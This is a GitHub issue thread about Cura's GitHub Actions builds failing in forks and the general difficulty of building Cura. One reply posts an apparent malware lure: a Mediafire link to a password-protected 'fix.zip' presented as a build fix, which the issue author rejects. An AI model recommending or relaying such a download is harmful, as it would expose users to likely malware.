Ultimaker/Cura #19583: Cura fork github actions fail to run

KimmoHop, 2024-08-26:
### Cura Version

? commit ad309b0

### Operating System

github actions

### Printer

not related

### Reproduction steps

1. fork Cura in github
2. wait for build actions to run

### Actual results

Run failed: All installers - master (ad309b0) _(or similar)_

### Expected results

Either:

- successful build or
- actions deactivated by default

### Add your .zip and screenshots here ⬇️

[image]
[image]

KimmoHop, 2024-08-26:
It would be nice to have at least one working way to build Cura and Cura Engine. If not locally (tried many times, abandoned equally many times), then in github.

Are there secrets or user settings missing? Are they documented somewhere?

PrusaSlicer building works out of the box. Maybe Cura build scripts could be improved to get correct versions (as in _they are compatible with each other and compile_) libraries and tools without manual work?

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

KimmoHop, 2024-08-26:
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Then give access to all files and all networks and add credit card number? Nope.

nathanielstenzel, 2024-10-03:
Maybe it has something to do with the Conan stuff that started in 2022?
I would also like to be able to either git clone or git fork.
I have been trying to git clone, but it seems like there are a bunch of unspecified build requirements and other projects that must first be compiled. I feel my issues with git clone are connected to kimmohop's issues with git fork.